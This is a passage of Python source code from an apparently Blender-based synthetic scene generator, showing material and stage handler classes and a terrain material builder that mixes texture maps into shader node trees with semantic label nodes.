pdraw.polygon(item, fill=(255, 255, 255, 127), outline=(255, 255, 255, 255))
img.paste(poly, mask=poly)
if not skip_vis:
img.show()
if save:
img.save(os.path.join(base_path, 'coco_annotated_{}.png'.format(image_idx)), "PNG")
```
#### File: assets/handle/TSSMaterialHandle.py
```python
import bpy
# utility imports
import numpy as np
import csv
import random
import importlib
from src.TSSBase import TSSBase
class TSSMaterialHandle(TSSBase):
"""docstring for TSSMaterialHandle"""
def __init__(self):
super(TSSMaterialHandle, self).__init__()
# class vars ###################################################################################################
self._material_dict = {} # list of materials [list]
self._material_obj_list = [] # list of materials nodes [list]
############################################################################################ end of class vars #
def reset_module(self):
""" reset all local vars
Args:
None
Returns:
None
"""
# reset all sensors ############################################################################################
for material in self._material_obj_list:
# reset sensor
material.reset_module()
            # maybe obsolete in future versions
del material
##################################################################################### end of reset all sensors #
self.reset_base()
# reset vars ###################################################################################################
self._material_dict = {}
self._material_obj_list = []
############################################################################################ end of reset vars #
def activate_pass(self,pass_name, pass_cfg, keyframe=-1):
""" activate pass function
Args:
pass_name: name of pass to activate [string]
pass_cfg: specific parameters for the pass [dict]
            keyframe: current frame number; if the value is > -1, a keyframe is also set [int]
Returns:
None
"""
for material in self._material_obj_list:
material.activate_pass(pass_name=pass_name,pass_cfg=pass_cfg,keyframe=keyframe)
def create(self):
""" create function
Args:
None
Returns:
None
"""
self._create_materials(cfg=self._cfg["MATERIALS"],
general_cfg=self._cfg["GENERAL"])
def _create_materials(self,cfg,general_cfg):
""" create function
Args:
cfg: cfg list of material modules [list]
general_cfg: general cfg [dict]
Returns:
success code [boolean]
"""
for ii, material in enumerate(cfg):
try:
# import module and create class #######################################################################
_module_name = "src.assets.materials." + material["type"]
_module = importlib.import_module(_module_name)
_class = getattr(_module, material["type"])
_material = _class()
################################################################ end of import module and create class #
# set pass params and create pass ######################################################################
# set general cfg
_material.set_general_cfg(cfg=general_cfg)
# save name of material
material["materialParams"]['name'] = material["name"]
# update sensor cfg
_material.update_cfg(cfg=material["materialParams"])
# create material
_material.create()
############################################################### end of set pass params and create pass #
# add pass to list
self._material_obj_list.append(_material)
self._material_dict[material["name"]] = _material.get_material()
except ImportError:
# manage import error
raise Exception("Cannot add material")
return 0
def get_materials(self):
""" return all materials
Args:
None
Returns:
dict of materials [dict]
"""
return self._material_dict
def get_material_objs(self):
""" get material objects
Args:
None
Returns:
list of material objects [list]
"""
return self._material_obj_list
```
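For reference, `_create_materials` expects the handle's cfg to contain a `GENERAL` dict plus a `MATERIALS` list whose entries name a module under `src.assets.materials`. A sketch of that layout (parameter values are illustrative placeholders only):
```python
# Illustrative cfg layout for TSSMaterialHandle; values are placeholders.
material_handle_cfg = {
    "GENERAL": {},                        # forwarded to every material via set_general_cfg()
    "MATERIALS": [
        {
            "name": "terrain_material_1",
            "type": "MaterialTerrain",    # resolved as src.assets.materials.MaterialTerrain
            "materialParams": {},         # passed to the material's update_cfg()
        },
    ],
}
```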
#### File: assets/handle/TSSStageHandle.py
```python
import bpy
# utility imports
import numpy as np
import csv
import random
import importlib
from src.TSSBase import TSSBase
class TSSStageHandle(TSSBase):
"""docstring for TSSStageHandle"""
def __init__(self):
super(TSSStageHandle, self).__init__()
# class vars ###################################################################################################
self._stage_list = [] # list of stage [list]
self._stage_obj_list = [] # list of stage nodes [list]
self._stage_dict = {} # dict of stages [dict]
############################################################################################ end of class vars #
def reset_module(self):
""" reset all local vars
Args:
None
Returns:
None
"""
# reset all stages ############################################################################################
for stage in self._stage_obj_list:
# reset sensor
stage.reset_module()
# maybe obsolete in future versions
del stage
##################################################################################### end of reset all stages #
self.reset_base()
self._stage_list = []
self._stage_obj_list = []
self._stage_dict = {}
def create(self,materials):
""" create function
Args:
materials: list of all materials [list]
Returns:
None
"""
self._create_stages(cfg=self._cfg["STAGES"],
general_cfg=self._cfg["GENERAL"],
materials=materials)
def update_after_meshes(self):
""" update mesh function
Args:
None
Returns:
None
"""
for stage in self._stage_obj_list:
stage.update_after_meshes()
def _create_stages(self,cfg,general_cfg,materials):
""" create function
Args:
cfg: list of stage cfgs [list]
general_cfg: general cfg [dict]
materials: list of all materials [list]
Returns:
None
"""
for ii, stage in enumerate(cfg):
try:
# import module and create class #######################################################################
_module_name = "src.assets.stages." + stage["type"]
_module = importlib.import_module(_module_name)
_class = getattr(_module, stage["type"])
_stage = _class()
################################################################ end of import module and create class #
# set pass params and create pass ######################################################################
# set general cfg
_stage.set_general_cfg(cfg=general_cfg)
# save name of stage
stage["stageParams"]['name'] = stage["name"]
# update stage cfg
_stage.update_cfg(cfg=stage["stageParams"])
# create material
_stage.create()
# return desired material
_material = _stage.get_desired_material()
############################################################### end of set pass params and create pass #
if _material:
if _material in materials:
_stage.apply_material(material=materials[_material])
else:
raise Exception("Material not found!")
# add pass to list
self._stage_obj_list.append(_stage)
self._stage_list.append(_stage.get_stage())
self._stage_dict[stage["name"]]=_stage.get_stage()
except ImportError:
# manage import error
raise Exception("Cannot add stage")
return 0
def get_stages(self):
""" get all stages
Args:
None
Returns:
list of stage [list]
"""
return self._stage_list
def get_stage_objs(self):
""" get all stage objects
Args:
None
Returns:
list of stage objects [list]
"""
return self._stage_obj_list
def get_stage_dict(self):
""" get all stage dict
Args:
None
Returns:
list of stage dict [dict]
"""
return self._stage_dict
```
#### File: assets/materials/MaterialTerrain.py
```python
import bpy
# utility imports
import numpy as np
import csv
import random
import importlib
import copy
import os
import json
import copy as cp
from src.assets.TSSMaterial import TSSMaterial
class MaterialTerrain(TSSMaterial):
"""docstring for MaterialTerrain"""
def __init__(self):
super(MaterialTerrain, self).__init__()
# class vars ###################################################################################################
self._material_list = []
self._texture_dict = {}
self._num_labels_per_channel = 15
self._general_terrain_cfg = None
self._terrain_cfg = None
self._label_ID_node = None
self._node_tree = None
############################################################################################ end of class vars #
def reset(self):
""" reset function
Args:
None
Returns:
None
"""
# class vars ###################################################################################################
self._material_list = []
self._texture_dict = {}
self._num_labels_per_channel = 15
self._general_terrain_cfg = None
self._terrain_cfg = None
self._label_ID_node = None
self._node_tree = None
############################################################################################ end of class vars #
def load_template_for_assets(self,cfg):
_cfg = []
# TODO: find more generic solution
for terrain_sample in cfg:
if "templatePath" in terrain_sample:
# check if relative or absolute path is provided
if not os.path.isabs(terrain_sample["templatePath"]):
# create abs path
_rel_path = terrain_sample["templatePath"]
_current_path = os.path.dirname(__file__)
terrain_sample["templatePath"] = os.path.join(_current_path,"../../../",_rel_path)
with open(terrain_sample["templatePath"], 'r') as f:
_terrain_sample_tmp = json.load(f)
_terrain_sample_tmp.update(terrain_sample)
terrain_sample = _terrain_sample_tmp
del _terrain_sample_tmp["templatePath"]
_cfg.append(_terrain_sample_tmp)
else:
_cfg.append(terrain_sample)
return _cfg
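    # Example (illustrative values) of a "terrainTextureList" entry that pulls most of its
    # parameters from a JSON template and only overrides a few fields:
    #
    #   { "templatePath": "cfg/templates/sand_terrain.json",   # path assumed
    #     "size": 2.0,
    #     "diffuse": True }
    #
    # Template keys are loaded first and then overwritten by keys given directly in the
    # entry (via the dict.update above).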
def create(self):
""" create function
Args:
None
Returns:
None
"""
# print info msg
self._print_msg("Create Terrain Material")
# get cfgs #####################################################################################################
_terrain_cfg = self._cfg["terrainTextureList"]
_general_terrain_cfg = self._cfg["general"]
############################################################################################# end of get cfgs #
_terrain_cfg = self.load_template_for_assets(_terrain_cfg)
# create material
_terrain_material =\
self._create_mix_terrain_material( material_name=self._cfg["name"],
general_terrain_cfg=_general_terrain_cfg,
terrain_cfg=_terrain_cfg,
num_min_mix_terrains=_general_terrain_cfg["minNumMixTerrains"],
num_max_mix_terrains=_general_terrain_cfg["maxNumMixTerrains"],
hard_label_borders=_general_terrain_cfg["hardLabelBorders"],
noise_phase_shift_enabled=False,
noise_phase_rate=1.0,
with_replacement=_general_terrain_cfg["withReplacement"])
# assign created material to material var
self._material = _terrain_material
def _create_mix_terrain_material( self, material_name, general_terrain_cfg, terrain_cfg,
num_max_mix_terrains, num_min_mix_terrains, hard_label_borders,
noise_phase_shift_enabled,noise_phase_rate, with_replacement=True):
""" create mix terrain material.
Args:
material_name: name of the resulting mixed terrain material [string]
general_terrain_cfg: general cfg for terrain [dict]
terrain_cfg: specific cfg for each pure terrain texture [dict]
num_max_mix_terrains: number of max pure textures, which are merged together. If set
to -1, all textures are used [int]
num_min_mix_terrains: number of min pure textures, which are merged together [int]
hard_label_borders: if true, hard borders are provided for semantic labels [boolean]
noise_phase_shift_enabled: noise phase shift flag [boolean]
noise_phase_rate: noise shift rate [float]
            with_replacement: sampling with replacement (true) or without (false) from the
terrain list [boolean]
Returns:
mixed terrain material [blObject]
"""
# create random selection of terrains ##########################################################################
# list of terrain, which will be used
_channel_list = []
# deepcopy terrain list to alter it
_terrain_cfg_copy = copy.deepcopy(terrain_cfg)
# check if all terrains are supposed to be used
if num_max_mix_terrains >= 0:
            # sample terrains num_max_mix_terrains times
if num_max_mix_terrains == 0:
num_max_mix_terrains = 1
self._print_msg("Warning: adjusted num_max_mix_terrains!")
if num_min_mix_terrains <= 0:
num_min_mix_terrains = 1
self._print_msg("Warning: adjusted num_min_mix_terrains!")
if num_min_mix_terrains > num_max_mix_terrains:
num_min_mix_terrains = num_max_mix_terrains
self._print_msg("Warning: adjusted num_min_mix_terrains!")
if num_min_mix_terrains > len(_terrain_cfg_copy):
num_min_mix_terrains = len(_terrain_cfg_copy)
self._print_msg("Warning: adjusted num_min_mix_terrains!")
if num_max_mix_terrains <= len(_terrain_cfg_copy):
_num_terrain_samples = random.randint(num_min_mix_terrains,num_max_mix_terrains)
else:
_num_terrain_samples = random.randint(num_min_mix_terrains,len(_terrain_cfg_copy))
self._print_msg("Warning: adjusted num_max_mix_terrains!")
for jj in range(0,_num_terrain_samples):
# pick random sample
item = random.choice(_terrain_cfg_copy)
# add sample to terrain list
_channel_list.append(item)
# remove item, depending on sampling method
if not with_replacement:
_terrain_cfg_copy.remove(item)
else:
# take entire terrain list
_channel_list = _terrain_cfg_copy
################################################################### end of create random selection of terrains #
# raise warning if _channel_list is empty
if not _channel_list:
self._print_msg("Warning: _channel_list is empty!")
# create mixed terrain material and return result
return self._create_materials(general_terrain_cfg, material_name, _channel_list, hard_label_borders,\
noise_phase_shift_enabled, noise_phase_rate)
def _get_map_path(self, base_path, prefix):
""" function to get path to texture files
Args:
base_path: base path of textures [string]
prefix: keyword, which has to be part of filename [string]
Returns:
path to file [string]
"""
# search for file with prefix in it
_map_file = None
_map_file = [filename for filename in os.listdir(base_path) if prefix in filename]
# check if any file was found ##################################################################################
if _map_file == []:
# no file was found
_map_file = None
else:
# compose abs path
_map_file = os.path.join(base_path,_map_file[0])
########################################################################## end of check if any file was found #
# return found file
return _map_file
def _create_materials( self, general_terrain_cfg, material_name, material_cfg_list, hard_label_borders,
noise_phase_shift_enabled = False, noise_phase_rate = 0.0):
""" create mix terrain material.
Args:
            general_terrain_cfg: general cfg for the terrain [dict]
            material_name: name of the resulting mixed terrain material [string]
            material_cfg_list: list of cfgs of the pure terrain textures to be mixed [list]
            hard_label_borders: if true, hard borders are provided for semantic labels [boolean]
            noise_phase_shift_enabled: noise phase shift flag [boolean]
            noise_phase_rate: noise shift rate [float]
Returns:
mixed terrain material [blObject]
"""
# define and prepare basic vars ################################################################################
# create new material
_terrain_material = bpy.data.materials.new(name=material_name)
# use nodes
_terrain_material.use_nodes = True
# house keeping
_terrain_material.node_tree.nodes.remove(_terrain_material.node_tree.nodes.get("Principled BSDF"))
# get all nodes
nodes = _terrain_material.node_tree.nodes
_terrain_material.cycles.displacement_method = 'BOTH'
# init nodePosBase
_node_offset = [0,0]
# current channel outputs
_latest_PBSDF_output = None
_latest_col_output = None
_latest_spec_output = None
_latest_rough_output = None
_latest_nrm_output = None
_latest_disp_output = None
_latest_label_output = None
# get material output node
_material_output = bpy.data.materials[material_name].node_tree.nodes["Material Output"]
_material_output.location = (_node_offset[0]+4300,_node_offset[1])
_noise_phase_shift_add_node = None
__noise_mapping_node_ist = []
_instance_switching_node_list = []
######################################################################### end of define and prepare basic vars #
# create mixed terrain material ################################################################################
for material_cfg in material_cfg_list:
# define map paths #########################################################################################
_col_map_path = None
_gloss_map_path = None
_rough_map_path = None
_spec_map_path = None
_refl_map_path = None
_normal_map_path = None
_disp_map_path = None
################################################################################## end of define map paths #
if not os.path.isabs(material_cfg['path']):
# create abs path
_current_path = os.path.dirname(__file__)
material_cfg['path'] = os.path.join(_current_path,"../../../",material_cfg['path'])
# get texture paths ########################################################################################
# get color map ############################################################################################
if (material_cfg['diffuse']):
_col_map_path = self._get_map_path(material_cfg['path'],"COL")
if _col_map_path is None:
_col_map_path = self._get_map_path(material_cfg['path'],"col")
if _col_map_path is None:
_col_map_path = self._get_map_path(material_cfg['path'],"DIFF")
if _col_map_path is None:
_col_map_path = self._get_map_path(material_cfg['path'],"diff")
if _col_map_path is None:
self._print_msg("WARNING: diffuse texture in folder " + material_cfg['path'] + \
" cannot be found! Using default color!")
##################################################################################### end of get color map #
# get reflectance map ######################################################################################
if (material_cfg['ref']):
_gloss_map_path = self._get_map_path(material_cfg['path'],"GLOSS")
if _gloss_map_path is None:
_gloss_map_path = self._get_map_path(material_cfg['path'],"gloss")
if _gloss_map_path is None:
_rough_map_path = self._get_map_path(material_cfg['path'],"rough")
if _rough_map_path is None:
_rough_map_path = self._get_map_path(material_cfg['path'],"rough")
if _rough_map_path is None:
self._print_msg("WARNING: roughness texture in folder " + material_cfg['path'] + \
" cannot be found! Using default color!")
############################################################################### end of get reflectance map #
# get specular map #########################################################################################
if (material_cfg['spec']):
_refl_map_path = self._get_map_path(material_cfg['path'],"REFL")
if _refl_map_path is None:
_refl_map_path = self._get_map_path(material_cfg['path'],"refl")
if _refl_map_path is None:
_spec_map_path = self._get_map_path(material_cfg['path'],"spec")
if _spec_map_path is None:
_spec_map_path = self._get_map_path(material_cfg['path'],"SPEC")
if _spec_map_path is None:
self._print_msg("WARNING: specular texture in folder " + material_cfg['path'] + \
" cannot be found! Using default color!")
################################################################################# end of get specular map #
# get normal map ###########################################################################################
if (material_cfg['normal']):
_normal_map_path = self._get_map_path(material_cfg['path'],"NRM")
if _normal_map_path is None:
_normal_map_path = self._get_map_path(material_cfg['path'],"nrm")
if _normal_map_path is None:
_normal_map_path = self._get_map_path(material_cfg['path'],"nor")
if _normal_map_path is None:
self._print_msg("WARNING: normal texture in folder " + material_cfg['path'] + \
" cannot be found! Using default color!")
#################################################################################### end of get normal map #
# get displacement map #####################################################################################
if (material_cfg['displacement']):
_disp_map_path = self._get_map_path(material_cfg['path'],"DISP")
if _disp_map_path is None:
_disp_map_path = self._get_map_path(material_cfg['path'],"HEIGHT")
if _disp_map_path is None:
_disp_map_path = self._get_map_path(material_cfg['path'],"disp")
if _disp_map_path is None:
_disp_map_path = self._get_map_path(material_cfg['path'],"height")
if _disp_map_path is None:
self._print_msg("WARNING: displacement texture in folder " + material_cfg['path'] + \
" cannot be found! Using default color!")
############################################################################## end of get displacement map #
################################################################################# end of get texture paths #
# get tiling parameter #####################################################################################
if 'imageTileX' in material_cfg:
imageTileX = material_cfg['imageTileX']
else:
imageTileX = 1.0
if 'imageTileY' in material_cfg:
imageTileY = material_cfg['imageTileY']
else:
imageTileY = 1.0
if 'size' in material_cfg:
imageSize = material_cfg['size']
else:
imageSize = 1.0
if 'mosaicRotation' in material_cfg:
mosaicRotation = material_cfg['mosaicRotation']
mosaicNoise = material_cfg['mosaicNoise']
else:
mosaicRotation = 0.0
mosaicNoise = 0.0
############################################################################## end of get tiling parameter #
# create texture for each channel ##########################################################################
# create DIFFUSE texture channel ###########################################################################
# load image and create basic shader #######################################################################
# check if image is already in use for other material
_current_col_output = None
if _col_map_path is not None:
if _col_map_path in self._texture_dict:
# reuse image
_img = self._texture_dict[_col_map_path]
else:
# load image
_img = bpy.data.images.load(_col_map_path)
self._texture_dict[_col_map_path] = _img
# create image shader node
_rgb_image = _terrain_material.node_tree.nodes.new('ShaderNodeTexImage')
_rgb_image.location = (_node_offset[0]-470,_node_offset[1]+400)
# use loaded image
_rgb_image.image = _img
# store current last col node
_current_col_output = _rgb_image
################################################################ end of load image and create basic shader #
# create color adjustemt if needed #########################################################################
if "colorAdjustment" in material_cfg:
# create RGB curve node
_color_adjustment_curve = _terrain_material.node_tree.nodes.new('ShaderNodeRGBCurve')
_color_adjustment_curve.location = (_node_offset[0],_node_offset[1]+400)
# read in and adjust color ramp ########################################################################
# brigthess adjustment
if "cColorPoints" in material_cfg["colorAdjustment"]:
for point_Idx, point in enumerate(material_cfg["colorAdjustment"]["cColorPoints"]):
_color_adjustment_curve.mapping.curves[3].points.new(point[0],point[1])
# red adjustment
if "rColorPoints" in material_cfg["colorAdjustment"]:
for point_Idx, point in enumerate(material_cfg["colorAdjustment"]["rColorPoints"]):
_color_adjustment_curve.mapping.curves[0].points.new(point[0],point[1])
# green adjustment
if "gColorPoints" in material_cfg["colorAdjustment"]:
for point_Idx, point in enumerate(material_cfg["colorAdjustment"]["gColorPoints"]):
_color_adjustment_curve.mapping.curves[1].points.new(point[0],point[1])
# blue adjustment
if "bColorPoints" in material_cfg["colorAdjustment"]:
for point_Idx, point in enumerate(material_cfg["colorAdjustment"]["bColorPoints"]):
_color_adjustment_curve.mapping.curves[2].points.new(point[0],point[1])
################################################################# end of read in and adjust color ramp #
# update color curve
_color_adjustment_curve.mapping.update()
# link rgb image to curve
_terrain_material.node_tree.links.new(_color_adjustment_curve.inputs[1],_current_col_output.outputs[0])
# change color output reference
_current_col_output = _color_adjustment_curve
################################################################## end of create color adjustemt if needed #
# add color variations if needed ###########################################################################
if "colorVariation" in material_cfg:
# create saturation node
_color_variation_node = _terrain_material.node_tree.nodes.new('ShaderNodeHueSaturation')
_color_variation_node.location = (_node_offset[0]+400,_node_offset[1]+200)
# read in and adjust ramp ##############################################################################
if "hue" in material_cfg["colorVariation"]:
_color_variation_node.inputs[0].default_value = material_cfg["colorVariation"]["hue"]
if "saturation" in material_cfg["colorVariation"]:
_color_variation_node.inputs[1].default_value = material_cfg["colorVariation"]["saturation"]
if "brithness" in material_cfg["colorVariation"]:
_color_variation_node.inputs[2].default_value = material_cfg["colorVariation"]["brithness"]
####################################################################### end of read in and adjust ramp #
# create merging noise for color variation
_color_variation_noise_node = _terrain_material.node_tree.nodes.new("ShaderNodeTexNoise")
_color_variation_noise_node.location = (_node_offset[0]+400,_node_offset[1]+700)
_color_variation_noise_node.noise_dimensions = '2D'
# read in and adjust noise #############################################################################
if "mergingNoiseScale" in material_cfg["colorVariation"]:
_color_variation_noise_node.inputs[2].default_value =\
material_cfg["colorVariation"]["mergingNoiseScale"]
if "mergingNoiseDetail" in material_cfg["colorVariation"]:
_color_variation_noise_node.inputs[3].default_value =\
material_cfg["colorVariation"]["mergingNoiseDetail"]
if "mergingNoiseRoughness" in material_cfg["colorVariation"]:
_color_variation_noise_node.inputs[4].default_value =\
material_cfg["colorVariation"]["mergingNoiseRoughness"]
if "mergingNoiseDistorion" in material_cfg["colorVariation"]:
_color_variation_noise_node.inputs[5].default_value =\
material_cfg["colorVariation"]["mergingNoiseDistorion"]
###################################################################### end of read in and adjust noise #
# create color ramp for variation ######################################################################
if material_cfg["colorVariation"]["mergingcolorRampActivated"]:
_merging_color_ramp_node = _terrain_material.node_tree.nodes.new("ShaderNodeValToRGB")
_merging_color_ramp_node.color_ramp.elements[0].color =\
( material_cfg["colorVariation"]["mergingColorStopColor_0"][0],\
material_cfg["colorVariation"]["mergingColorStopColor_0"][1],\
material_cfg["colorVariation"]["mergingColorStopColor_0"][2],\
material_cfg["colorVariation"]["mergingColorStopColor_0"][3])
_merging_color_ramp_node.color_ramp.elements[0].position =\
material_cfg["colorVariation"]["mergingColorStopPosition_0"]
_merging_color_ramp_node.color_ramp.elements[1].color =\
( material_cfg["colorVariation"]["mergingColorStopColor_1"][0],\
material_cfg["colorVariation"]["mergingColorStopColor_1"][1],\
material_cfg["colorVariation"]["mergingColorStopColor_1"][2],\
material_cfg["colorVariation"]["mergingColorStopColor_1"][3])
_merging_color_ramp_node.color_ramp.elements[1].position =\
material_cfg["colorVariation"]["mergingColorStopPosition_1"]
_merging_color_ramp_node.location = (_node_offset[0]+800,_node_offset[1]+700)
_color_variation_mix_node = _terrain_material.node_tree.nodes.new("ShaderNodeMixRGB")
_color_variation_mix_node.location = (_node_offset[0]+1200,_node_offset[1]+400)
if "mergingMode" in material_cfg["colorVariation"]:
_color_variation_mix_node.blend_type = material_cfg["colorVariation"]["mergingMode"]
############################################################### end of create color ramp for variation #
# link it ##############################################################################################
_terrain_material.node_tree.links.new( _color_variation_node.inputs[4],
_current_col_output.outputs[0])
_terrain_material.node_tree.links.new( _color_variation_mix_node.inputs[1],
_current_col_output.outputs[0])
_terrain_material.node_tree.links.new( _color_variation_mix_node.inputs[2],
_color_variation_node.outputs[0])
if material_cfg["colorVariation"]["mergingcolorRampActivated"]:
_terrain_material.node_tree.links.new( _merging_color_ramp_node.inputs[0],
_color_variation_noise_node.outputs[0])
_terrain_material.node_tree.links.new( _color_variation_mix_node.inputs[0],
_merging_color_ramp_node.outputs[0])
else:
_terrain_material.node_tree.links.new( _color_variation_mix_node.inputs[0],
_color_variation_noise_node.outputs[0])
####################################################################################### end of link it #
# update current last color output reference
_current_col_output = _color_variation_mix_node
#################################################################### end of add color variations if needed #
if not _current_col_output:
# provide default rgb value
_col_default = _terrain_material.node_tree.nodes.new('ShaderNodeRGB')
_col_default.location = (_node_offset[0]-470,_node_offset[1]+400)
_col_default.outputs[0].default_value[0] = 0.5
_col_default.outputs[0].default_value[1] = 0.5
_col_default.outputs[0].default_value[2] = 0.5
_col_default.outputs[0].default_value[3] = 1.0
_current_col_output = _col_default
#################################################################### end of create DIFFUSE texture channel #
# create ROUGHNESS texture channel #########################################################################
_current_rough_output = None
# use roughness or glossy map ##############################################################################
if _rough_map_path is not None:
# check if image is already in use for other material
if _rough_map_path in self._texture_dict:
_img = self._texture_dict[_rough_map_path]
else:
_img = bpy.data.images.load(_rough_map_path)
self._texture_dict[_rough_map_path] = _img
# create image shader node #############################################################################
_roughness_image = _terrain_material.node_tree.nodes.new('ShaderNodeTexImage')
_roughness_image.image = _img
_roughness_image.image.colorspace_settings.name = 'Non-Color'
_roughness_image.location = (_node_offset[0]-470,_node_offset[1]-200)
###################################################################### end of create image shader node #
# update current last roughness node
_current_rough_output = _roughness_image
else:
# create GLOSSY texture shader
# TODO rename ref_map to glossy_map
# check if image is already in use for other material
if _gloss_map_path is not None:
if _gloss_map_path in self._texture_dict:
_img = self._texture_dict[_gloss_map_path]
else:
_img = bpy.data.images.load(_gloss_map_path)
self._texture_dict[_gloss_map_path] = _img
# create image shader node #########################################################################
_glossy_image = _terrain_material.node_tree.nodes.new('ShaderNodeTexImage')
_glossy_image.image = _img
_glossy_image.image.colorspace_settings.name = 'Non-Color'
_glossy_image.location = (_node_offset[0]-470,_node_offset[1]-200)
################################################################## end of create image shader node #
# create invert map
_invert_node = _terrain_material.node_tree.nodes.new('ShaderNodeInvert')
_invert_node.location = (_node_offset[0]-200,_node_offset[1]-200)
# link nodes
_terrain_material.node_tree.links.new(_invert_node.inputs[1],_glossy_image.outputs[0])
# update current last roughness node
_current_rough_output = _invert_node
################################################################### end of use roughness or glossy map #
################################################################## end of create ROUGHNESS texture channel #
# create SPECULAR texture channel ##########################################################################
_current_spec_output = None
if not _current_rough_output:
if _spec_map_path is not None:
if _spec_map_path in self._texture_dict:
_img = self._texture_dict[_spec_map_path]
else:
_img = bpy.data.images.load(_spec_map_path)
self._texture_dict[_spec_map_path] = _img
# create image shader node #########################################################################
_specular_image = _terrain_material.node_tree.nodes.new('ShaderNodeTexImage')
_specular_image.image = _img
_specular_image.image.colorspace_settings.name = 'Non-Color'
_specular_image.location = (_node_offset[0]-470,_node_offset[1]+100)
################################################################## end of create image shader node #
# create invert map
_invert_node = _terrain_material.node_tree.nodes.new('ShaderNodeInvert')
_invert_node.location = (_node_offset[0]-200,_node_offset[1]+100)
# link nodes
_terrain_material.node_tree.links.new(_invert_node.inputs[1],_specular_image.outputs[0])
# update current last spec node
_current_spec_output = _invert_node
else:
# TODO: add reflectance code here!
pass
if not _current_rough_output and not _current_spec_output:
# provide default rgb value
_glossy_default = _terrain_material.node_tree.nodes.new('ShaderNodeRGB')
_glossy_default.location = (_node_offset[0]-470,_node_offset[1]-200)
_glossy_default.outputs[0].default_value[0] = 0.5
_glossy_default.outputs[0].default_value[1] = 0.5
_glossy_default.outputs[0].default_value[2] = 0.5
_glossy_default.outputs[0].default_value[3] = 1.0
_current_rough_output = _glossy_default
################################################################### end of create SPECULAR texture channel #
# create NORMAL image texture channel ######################################################################
_current_nrm_output = None
if _normal_map_path is not None:
# check if image is already in use for other material
if _normal_map_path in self._texture_dict:
_img = self._texture_dict[_normal_map_path]
else:
_img = bpy.data.images.load(_normal_map_path)
self._texture_dict[_normal_map_path] = _img
# create image shader node #############################################################################
_normal_image = _terrain_material.node_tree.nodes.new('ShaderNodeTexImage')
_normal_image.image = _img
_normal_image.image.colorspace_settings.name = 'Non-Color'
_normal_image.location = (_node_offset[0]-470,_node_offset[1]-500)
###################################################################### end of create image shader node #
# update current last normal node
_current_nrm_output = _normal_image
if not _current_nrm_output:
# provide default rgb value
_nrm_default = _terrain_material.node_tree.nodes.new('ShaderNodeRGB')
_nrm_default.location = (_node_offset[0]-470,_node_offset[1]-500)
_nrm_default.outputs[0].default_value[0] = 0.5
_nrm_default.outputs[0].default_value[1] = 0.5
_nrm_default.outputs[0].default_value[2] = 0.5
_nrm_default.outputs[0].default_value[3] = 1.0
_current_nrm_output = _nrm_default
############################################################## end of create NORMAL image texture channel #
# create DISPLACEMENT image texture channel ################################################################
_current_disp_output = None
if _disp_map_path is not None:
# check if image is already in use for other material
if _disp_map_path in self._texture_dict:
_img = self._texture_dict[_disp_map_path]
else:
_img = bpy.data.images.load(_disp_map_path)
self._texture_dict[_disp_map_path] = _img
# create image shader node #############################################################################
_disp_image = _terrain_material.node_tree.nodes.new('ShaderNodeTexImage')
_disp_image.image = _img
_disp_image.image.colorspace_settings.name = 'Non-Color'
_disp_image.location = (_node_offset[0],_node_offset[1]-700)
###################################################################### end of create image shader node #
# add color ramp node ##################################################################################
dispColorRampNode = _terrain_material.node_tree.nodes.new("ShaderNodeValToRGB")
if "dispStrength" in material_cfg:
_disp_strength = material_cfg["dispStrength"]
material_cfg['dispColorStopPosition_0'] = 0.0
material_cfg['dispColorStopPosition_1'] = 1.0
material_cfg['dispColorStopColor_0'] = [0.0,0.0,0.0,1.0]
material_cfg['dispColorStopColor_1'] = [_disp_strength,_disp_strength,_disp_strength,1.0]
dispColorRampNode.color_ramp.elements[0].color = ( material_cfg['dispColorStopColor_0'][0],\
material_cfg['dispColorStopColor_0'][1],\
material_cfg['dispColorStopColor_0'][2],\
material_cfg['dispColorStopColor_0'][3])
dispColorRampNode.color_ramp.elements[0].position = material_cfg['dispColorStopPosition_0']
dispColorRampNode.color_ramp.elements[1].color = ( material_cfg['dispColorStopColor_1'][0],\
material_cfg['dispColorStopColor_1'][1],\
material_cfg['dispColorStopColor_1'][2],\
material_cfg['dispColorStopColor_1'][3])
dispColorRampNode.color_ramp.elements[1].position = material_cfg['dispColorStopPosition_1']
dispColorRampNode.location = (_node_offset[0]+400,_node_offset[1]-700)
########################################################################### end of add color ramp node #
# link it
_terrain_material.node_tree.links.new(dispColorRampNode.inputs[0], _disp_image.outputs[0])
# update current last disp node
_current_disp_output = dispColorRampNode
if not _current_disp_output:
# provide default rgb value
_disp_default = _terrain_material.node_tree.nodes.new('ShaderNodeRGB')
_disp_default.location = (_node_offset[0],_node_offset[1]-700)
_disp_default.outputs[0].default_value[0] = 0.5
_disp_default.outputs[0].default_value[1] = 0.5
_disp_default.outputs[0].default_value[2] = 0.5
_disp_default.outputs[0].default_value[3] = 1.0
_current_disp_output = _disp_default
#########################################
################################################################### end of create texture for each channel #
# create mapping nodes for tiling textures #################################################################
# TODO change!
mat_config = self.load_nodegroup_config("uber_mapping")
node_group = self.create_nodegroup_from_config(mat_config)
_mapping_node = _terrain_material.node_tree.nodes.new(type='ShaderNodeGroup')
_mapping_group = node_group
# custom_mapping
_mapping_node.node_tree = _mapping_group
_mapping_node.name = _mapping_group.name
_mapping_node.location = (_node_offset[0]-700,_node_offset[1])
_mapping_node.inputs[1].default_value = imageSize
_mapping_node.inputs[6].default_value = mosaicRotation
_mapping_node.inputs[7].default_value = mosaicNoise
_tex_coord_node = _terrain_material.node_tree.nodes.new('ShaderNodeTexCoord')
_tex_coord_node.location = (_node_offset[0]-900,_node_offset[1])
_terrain_material.node_tree.links.new(_mapping_node.inputs[0], _tex_coord_node.outputs[0])
if _col_map_path is not None:
_terrain_material.node_tree.links.new(_rgb_image.inputs[0], _mapping_node.outputs[0])
if _spec_map_path is not None:
_terrain_material.node_tree.links.new(_specular_image.inputs[0], _mapping_node.outputs[0])
if _gloss_map_path is not None:
_terrain_material.node_tree.links.new(_glossy_image.inputs[0], _mapping_node.outputs[0])
if _rough_map_path is not None:
_terrain_material.node_tree.links.new(_roughness_image.inputs[0], _mapping_node.outputs[0])
if _normal_map_path is not None:
_terrain_material.node_tree.links.new(_normal_image.inputs[0], _mapping_node.outputs[0])
if _disp_map_path is not None:
_terrain_material.node_tree.links.new(_disp_image.inputs[0], _mapping_node.outputs[0])
########################################################## end of create mapping nodes for tiling textures #
# setup semantic nodes #####################################################################################
_label_node, self._label_ID_node = self.create_semantic_nodes( \
node_tree=_terrain_material,
num_label_per_channel=self._num_labels_per_channel,
label_ID_vec=material_cfg['passParams']\
['semantic_label']['labelIDVec'][0],
uv_map = _mapping_node.outputs[0],
